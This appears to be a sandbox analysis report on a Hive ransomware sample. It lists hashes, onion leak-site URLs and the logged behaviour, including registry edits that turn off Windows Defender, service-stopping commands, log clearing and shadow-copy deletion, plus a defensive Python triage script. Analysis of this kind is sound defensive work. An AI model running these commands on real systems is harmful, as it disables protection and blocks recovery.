Overview (score 10)
Static (score 7)

Tasks (sample, sandbox platform, score):
  Ransomware.Hive.zip    windows7-x64         1
  Ransomware.Hive.zip    windows10-1703-x64   1
  211xahcou.exe          windows7-x64         10
  211xahcou.exe          windows10-1703-x64   10
  Hive.elf               windows7-x64         3
  Hive.elf               windows10-1703-x64   3
  hive.exe               windows7-x64         10
  hive.exe               windows10-1703-x64   10
  hive_linux_elf         windows7-x64         1
  hive_linux_elf         windows10-1703-x64   1
  linux_hive.elf         windows7-x64         3
  linux_hive.elf         windows10-1703-x64   3
  sjl8j6ap3.exe          windows7-x64         1
  sjl8j6ap3.exe          windows10-1703-x64   1
  windows_25...c5.exe    windows7-x64         10
  windows_25...c5.exe    windows10-1703-x64   10   (the task this report covers)
  zi1ysv64h.exe          windows7-x64         10
  zi1ysv64h.exe          windows10-1703-x64   10

The ELF samples score 1-3 only because they were run on Windows images and could not execute; the Windows PE samples all reach the maximum score.

Analysis
  max time kernel:   330s
  max time network:  332s
  platform:          windows10-1703_x64
  resource:          win10-20231215-en
  resource tags:     arch:x64, arch:x86, image:win10-20231215-en, locale:en-us, os:windows10-1703-x64, system
  submitted:         12-02-2024 06:38
Behavioral tasks (task, sample, resource):
  behavioral1    Ransomware.Hive.zip    win7-20231215-en
  behavioral2    Ransomware.Hive.zip    win10-20231215-en
  behavioral3    211xahcou.exe          win7-20231215-en
  behavioral4    211xahcou.exe          win10-20231215-en
  behavioral5    Hive.elf               win7-20231215-en
  behavioral6    Hive.elf               win10-20231215-en
  behavioral7    hive.exe               win7-20231215-en
  behavioral8    hive.exe               win10-20231215-en
  behavioral9    hive_linux_elf         win7-20231215-en
  behavioral10   hive_linux_elf         win10-20231215-en
  behavioral11   linux_hive.elf         win7-20231215-en
  behavioral12   linux_hive.elf         win10-20231215-en
  behavioral13   sjl8j6ap3.exe          win7-20231215-en
  behavioral14   sjl8j6ap3.exe          win10-20231215-en
  behavioral15   windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe   win7-20231215-en
  behavioral16   windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe   win10-20231215-en
  behavioral17   zi1ysv64h.exe          win7-20231215-en
General
  Target:  windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
  Size:    884KB
  MD5:     da13022097518d123a91a3958be326da
  SHA1:    24a71ab462594d5a159bbf176588af951aba1381
  SHA256:  25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5
  SHA512:  a82aa97a92cd21ee2d4b556448fd3293396eb7c01d3626ebdb6c3816277783578686830c430014b6b2fc3280bc1301df27da079937f88834c2d35641eb5fc26f
  SSDEEP:  12288:Sw41dVZvThPCsM18GLHe7wlDdkPAQEtxr0fflvRmhEBWtdUJiAUtP/T/kAfMvgVt:dod1HDmlDdkZ4YXPpaTTXMw
Malware Config
Extracted
  Path:    C:\Program Files\Common Files\DESIGNER\EGdu_HOW_TO_DECRYPT.txt
  Family:  hive
  URLs:    http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
           http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
The configuration was recovered from the dropped ransom note; the two .onion hosts are, as their names suggest, the group's leak site and the victim ("customer") portal.
Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the mpcmdrun utility to delete all AV definitions.
  PID 64   MpCmdRun.exe
Hive
A ransomware written in Golang first seen in June 2021.

Modifies Windows Defender Real-time Protection settings
All operations by reg.exe under \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection:
  Key deleted      Real-Time Protection
  Key created      Real-Time Protection   (three times)
  Set value (int)  DisableOnAccessProtection = "1"
  Set value (int)  DisableRealtimeMonitoring = "1"
  Set value (int)  DisableBehaviorMonitoring = "1"
  Set value (int)  DisableIOAVProtection = "1"
  Key created      Real-Time Protection   (three more times)
  Set value (int)  DisableScanOnRealtimeEnable = "1"
The key is first deleted (which matches the reg.exe delete in the process tree) and then recreated with every real-time component switched off by policy. Policy values under HKLM\SOFTWARE\Policies take precedence over the user-facing Defender settings, so the UI toggles cannot undo them; they have to be removed from the policy hive.

Modifies security service (2 TTPs, 1 IoC)
  Set value (int)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"   reg.exe
Start = 4 is SERVICE_DISABLED, so the Defender service will not come back on the next boot even if the policy keys above are cleaned up.
Clears Windows event logs (1 TTP, 3 IoCs)
  PID 1508   wevtutil.exe
  PID 4856   wevtutil.exe
  PID 4700   wevtutil.exe

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

UPX packed file (yara rule: upx)
The rule matched the same region, 0x0000000001230000-0x0000000001542000, in 22 memory dumps of PID 3884 (behavioral16/memory/3884-N-0x0000000001230000-0x0000000001542000-memory.dmp for N = 0, 1, 2, 263, 2728, 3879, 6383, 6933, 8110, 8113, 8116, 8121, 8125, 8130, 8134, 8138, 8143, 8147, 8152, 8156, 8161 and 8205). The region is 0x312000 bytes (about 3.1 MB) against an 884 KB file on disk, consistent with a UPX-packed binary that has been unpacked in memory; a memory dump of that region, not the file on disk, is the right input for static analysis.
Drops file in Program Files directory (64 IoCs)
All 64 operations are by windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe (PID 3884). Three kinds of entry appear: files renamed to <original name>.<64-character token>.uj1ps (the encrypted files; the first 42 characters of the token are identical across this run and the last 22 differ per file), EGdu_HOW_TO_DECRYPT.txt created in each directory visited (the ransom note), and files opened for modification without a rename, for which this listing alone does not show whether the content changed.
  File opened for modification  C:\Program Files\Microsoft Office\root\vreg\powerpoint.x-none.msi.16.x-none.vreg.dat.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqHKs0pfx7pBUjNmqVL0s9c.uj1ps
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SplashScreen.scale-200.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreBadgeLogo.scale-200.png
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pt-br\ui-strings.js.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXrwTUiZFRiHO0VRcVxLVfZA.uj1ps
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSplashSquareTile.scale-125.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Work\SmallTile.scale-200.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SplashScreen.scale-100_contrast-black.png
  File opened for modification  C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\ja-JP\mshwLatin.dll.mui.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXq9_o47TgJ5O7ZoMH3W6OcS.uj1ps
  File opened for modification  C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\it-IT\TipRes.dll.mui
  File opened for modification  C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Cartridges\as80.xsl.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqC__z2qkFmXhkgL8G3Lb4j.uj1ps
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\Assets\contrast-white\OneConnectAppList.targetsize-64.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-80.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\XboxApp.UI\Resources\Images\star_empty.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-100_kzf8qxf38zg5c\SkypeApp\Assets\SkypeLogo.scale-100.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_neutral_split.scale-100_8wekyb3d8bbwe\Lumia.ViewerPlugin\Assets\IconOpenInCinemagraph.scale-100.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe7d1.png
  File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailBadge.scale-400.png
  File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\it-IT.PhoneNumber.ot
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons2x.png.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXpJVubJmeNQWFiseKJVdsQI.uj1ps
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ms_get.svg.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXpYiqa4QcYTFB307Rtqea9I.uj1ps
  File created                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sv-se\EGdu_HOW_TO_DECRYPT.txt
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\ui-strings.js.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXom84mdX-qfK_QZUKSni7kj.uj1ps
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner.png.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXrM011-nPN_UOeMrm_ZPgB5.uj1ps
  File created                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\EGdu_HOW_TO_DECRYPT.txt
  File opened for modification  C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11701.1001.87.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\SplashScreen.scale-125.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\StoreLogo.scale-100.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-40_altform-unplated_contrast-black.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-30_altform-unplated_contrast-white.png
  File opened for modification  C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqNRRKCCka3GV9lrVDOin9B.uj1ps
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-256_altform-unplated_contrast-white.png
  File created                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\EGdu_HOW_TO_DECRYPT.txt
  File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Yahoo-Dark.scale-250.png
  File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\es-ES.PhoneNumber.ot
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_empty_state.svg.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqa_mPPq65wSnkJFyDU20k3.uj1ps
  File created                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ro-ro\EGdu_HOW_TO_DECRYPT.txt
  File opened for modification  C:\Program Files\Java\jdk-1.8\legal\jdk\lcms.md.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXq4moc8W1j1H4Fr9OoCadAY.uj1ps
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Trial-pl.xrm-ms.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXp5msI6D8vBaYpwe4nozx8l.uj1ps
  File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeSmallTile.scale-125.png
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZY______.PFB.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXorUvhmVXDrMEA7fi5FsgU9.uj1ps
  File created                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\cs-cz\EGdu_HOW_TO_DECRYPT.txt
  File created                  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\EGdu_HOW_TO_DECRYPT.txt
  File opened for modification  C:\Program Files\StepExpand.svgz.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXphcFhLLaCVWfiiEh6ubAwg.uj1ps
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\PlaneCutKeepBottom.scale-180.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\ThirdPartyNotices_Arkadium.txt
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_ja_135x40.svg.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqSyrtvJ8ekI2NCf2TreoYF.uj1ps
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\ui-strings.js.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXoJ7uz-dgRGJvq6kG3gi-Ug.uj1ps
  File opened for modification  C:\Program Files\Common Files\System\msadc\fr-FR\msadcer.dll.mui.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXrhcErNIqwGJ-2F9bCtOfs6.uj1ps
  File opened for modification  C:\Program Files\Microsoft Office\root\vfs\Fonts\private\LEELAWAD.TTF.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqi3kvBKn2ueYISuWLovotT.uj1ps
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\TimerSmallTile.scale-200.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubBadgeLogo.scale-200_contrast-high.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\Tab\TabComing.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\TimerSmallTile.contrast-white_scale-100.png
  File opened for modification  C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CASCADE\CASCADE.ELM.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqLxl2G2z5zbXCD86ta468v.uj1ps
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Content\images\en-US\windows-main-08294e1b-0ad7-4937-9616-fcbc42ff7ff1.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\images\OfficeHubLogo_71x71.png
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Awards\common\Flipping_Out_Unearned_small.png
  File opened for modification  C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial4-ul-oob.xrm-ms.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqbauPNS3ADJ2s2uGvq0hpc.uj1ps
  File opened for modification  C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL075.XML.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXoFv9bJg3DVN87GDPckIgwh.uj1ps
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\ko-kr\ui-strings.js.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXp0kgUJyIXTaJhE1Lnx6-wG.uj1ps
  File opened for modification  C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXpAXb7JKT3KAFz3VgXXkMtR.uj1ps
  File opened for modification  C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\LargeLogo.scale-100_contrast-white.png
  File opened for modification  C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6584_32x32x32.png
  File opened for modification  C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\PREVIEW.GIF.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXq0tV633niGCcBrI68KoJs7.uj1ps
  File opened for modification  C:\Program Files\Windows Defender\es-ES\shellext.dll.mui
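An added example, not code from tria.ge or from the Hive operators: a Python triage pass over the listing above that separates the three kinds of entry (renamed/encrypted file, ransom note, plain modification) and measures how much of the rename token is constant across the run. SAMPLE_ENTRIES is a constructed subset copied from the 64 entries above; the 42-constant / 22-varying split it reports is an observation from this run, not a statement about Hive's key format. The same classifier runs unchanged over the full list or over a file-system walk of an infected host.

```python
"""Triage of the 'Drops file in Program Files directory' entries above.

Added example for this report page, not tria.ge or Hive code.  SAMPLE_ENTRIES
is a constructed subset of the 64 entries listed above; the constant/varying
split of the rename token is what this run shows, not documented Hive internals.
"""
import re
from collections import Counter

RANSOM_NOTE = "EGdu_HOW_TO_DECRYPT.txt"
# Rename pattern seen above: <original name>.<64-char base64url-style token>.uj1ps
ENCRYPTED_NAME = re.compile(r"^(?P<orig>.+)\.(?P<token>[A-Za-z0-9_-]{64})\.uj1ps$")

SAMPLE_ENTRIES = [  # (operation, path) copied from the report's listing
    ("File opened for modification",
     r"C:\Program Files\Microsoft Office\root\vreg\powerpoint.x-none.msi.16.x-none.vreg.dat.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqHKs0pfx7pBUjNmqVL0s9c.uj1ps"),
    ("File opened for modification",
     r"C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SplashScreen.scale-200.png"),
    ("File opened for modification",
     r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pt-br\ui-strings.js.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXrwTUiZFRiHO0VRcVxLVfZA.uj1ps"),
    ("File created",
     r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sv-se\EGdu_HOW_TO_DECRYPT.txt"),
    ("File opened for modification",
     r"C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXqNRRKCCka3GV9lrVDOin9B.uj1ps"),
    ("File created",
     r"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\da-dk\EGdu_HOW_TO_DECRYPT.txt"),
    ("File opened for modification",
     r"C:\Program Files\Windows Defender\es-ES\shellext.dll.mui"),
    ("File opened for modification",
     r"C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\ja-JP\mshwLatin.dll.mui.d3aZ9ZDOgFf-WPvwL4ldcY9yoNlUNsH2RJ2gG-zWfXq9_o47TgJ5O7ZoMH3W6OcS.uj1ps"),
]


def basename(path):
    """Last component of a Windows path (the report paths use backslashes)."""
    return path.rsplit("\\", 1)[-1]


def classify(path):
    """Label one dropped-file entry as ransom_note, encrypted or touched."""
    name = basename(path)
    if name == RANSOM_NOTE:
        return {"kind": "ransom_note", "name": name, "token": None}
    m = ENCRYPTED_NAME.match(name)
    if m:
        return {"kind": "encrypted", "name": m.group("orig"), "token": m.group("token")}
    # Opened for modification but not renamed: the listing alone does not
    # say whether the content changed, so do not call it encrypted.
    return {"kind": "touched", "name": name, "token": None}


def common_prefix(strings):
    """Longest common prefix; the lexicographic min and max already share it."""
    if not strings:
        return ""
    lo, hi = min(strings), max(strings)
    i = 0
    while i < len(lo) and i < len(hi) and lo[i] == hi[i]:
        i += 1
    return lo[:i]


def triage(entries):
    """Summarise a list of (operation, path) entries from the report."""
    rows = [{"op": op, "path": path, **classify(path)} for op, path in entries]
    tokens = [r["token"] for r in rows if r["kind"] == "encrypted"]
    prefix = common_prefix(tokens)
    return {
        "counts": dict(Counter(r["kind"] for r in rows)),
        "token_prefix": prefix,
        "constant_chars": len(prefix),
        "varying_chars": (64 - len(prefix)) if tokens else 0,
        "note_dirs": sorted({r["path"].rsplit("\\", 1)[0]
                             for r in rows if r["kind"] == "ransom_note"}),
        "rows": rows,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_ENTRIES)
    print(result["counts"])
    print("shared token prefix:", result["token_prefix"],
          f"({result['constant_chars']} of 64 characters)")
    for r in result["rows"]:
        print(f"{r['kind']:12} {r['name']}")
```

A shared 42-character prefix with 22 characters that change per file is the kind of structure worth recording in the incident notes: it tells you the token is not a per-file random blob, and it gives a reliable filename regex for scoping the encryption across hosts without relying on the .uj1ps extension, which varies between Hive builds.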
Launches sc.exe (9 IoCs)
sc.exe is the Windows utility for controlling services on the system.
  PIDs 428, 1576, 4140, 1396, 2724, 932, 3324, 3900, 5108   sc.exe

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
  PID 764   vssadmin.exe

Modifies registry class (3 IoCs)
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP          reg.exe
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP  reg.exe
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP      Conhost.exe
EPP is the Windows Defender shell extension (the "Scan with Windows Defender" context-menu entry served by shellext.dll); removing the handler for files, directories and drives hides that entry. The third deletion is attributed by the sandbox to Conhost.exe rather than reg.exe.

Opens file in notepad (likely ransom note) (1 IoC)
  PID 348   notepad.exe

Runs net.exe
(see the net.exe stop commands in the process tree)

Runs ping.exe (1 TTP, 1 IoC)
  PID 4576   PING.EXE

Suspicious behavior: EnumeratesProcesses (8 IoCs)
  PID 1516   powershell.exe   (three times)
  PID 4208   powershell.exe   (three times)
  PID 3884   windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe   (twice)
Neither PowerShell process appears in the truncated process tree below.

Suspicious use of AdjustPrivilegeToken (64 IoCs)
  wevtutil.exe PID 1508:  SeSecurityPrivilege, SeBackupPrivilege
  wevtutil.exe PID 4700:  SeSecurityPrivilege, SeBackupPrivilege
  wevtutil.exe PID 4856:  SeSecurityPrivilege, SeBackupPrivilege
  wmic.exe PID 2728:      SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  wmic.exe PID 1720:      the same 21 privileges, logged once in full and a second time up to SeUndockPrivilege (the list is capped at 64 IoCs)
The bare numbers are privilege LUIDs the sandbox did not resolve: 33 is SeIncreaseWorkingSetPrivilege, 34 SeTimeZonePrivilege, 35 SeCreateSymbolicLinkPrivilege and 36 SeDelegateSessionUserImpersonatePrivilege. wevtutil needs SeSecurityPrivilege and SeBackupPrivilege to clear the Security log, which fits the "Clears Windows event logs" signature above; the wmic.exe command lines are not captured in this report.

Suspicious use of WriteProcessMemory (64 IoCs)
Each parent/child pair is logged three times (the sandbox's procid_target in parentheses); the list is capped at 64 entries, so the last pair appears once.
  3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe -> 372 net.exe (76)
  372 net.exe  -> 4648 (77)
  3884 sample  -> 4504 net.exe (204)
  4504 net.exe -> 4056 (78)
  3884 sample  -> 4644 net.exe (202)
  4644 net.exe -> 4220 (201)
  3884 sample  -> 4336 net.exe (80)
  4336 net.exe -> 2472 (199)
  3884 sample  -> 3292 net.exe (198)
  3292 net.exe -> 2536 (81)
  3884 sample  -> 960 net.exe (196)
  960 net.exe  -> 4112 (194)
  3884 sample  -> 4376 net.exe (193)
  4376 net.exe -> 3656 (191)
  3884 sample  -> 1936 net.exe (101)
  1936 net.exe -> 4476 (124)
  3884 sample  -> 1004 net.exe (85)
  1004 net.exe -> 4316 (84)
  3884 sample  -> 5108 sc.exe (97)
  3884 sample  -> 1576 sc.exe (86)
  3884 sample  -> 932 sc.exe (89)
  3884 sample  -> 4140 sc.exe (91)   (logged once)
The three writes per child are the normal CreateProcess start-up pattern, so this signature is evidence of process creation, not injection; the children of net.exe are the net1.exe helpers that carry the actual "stop" command, which is why a detection rule keyed on net.exe alone misses the service name.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
- C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe (PID 3884)
  "C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe"
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\net.exe (PID 372)
    net.exe stop "SamSs" /y
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe (PID 4648)
      C:\Windows\system32\net1 stop "SamSs" /y
  - C:\Windows\SysWOW64\net.exe (PID 4336)
    net.exe stop "UI0Detect" /y
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe (PID 2472)
      C:\Windows\system32\net1 stop "UI0Detect" /y
  - C:\Windows\SysWOW64\net.exe (PID 1004)
    net.exe stop "UnistoreSvc_156f2" /y
    - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\sc.exe (PID 1576)
    sc.exe config "SDRSVC" start= disabled
    - Launches sc.exe
  - C:\Windows\SysWOW64\sc.exe (PID 932)
    sc.exe config "SstpSvc" start= disabled
    - Launches sc.exe
  - C:\Windows\SysWOW64\sc.exe (PID 4140)
    sc.exe config "UI0Detect" start= disabled
    - Launches sc.exe
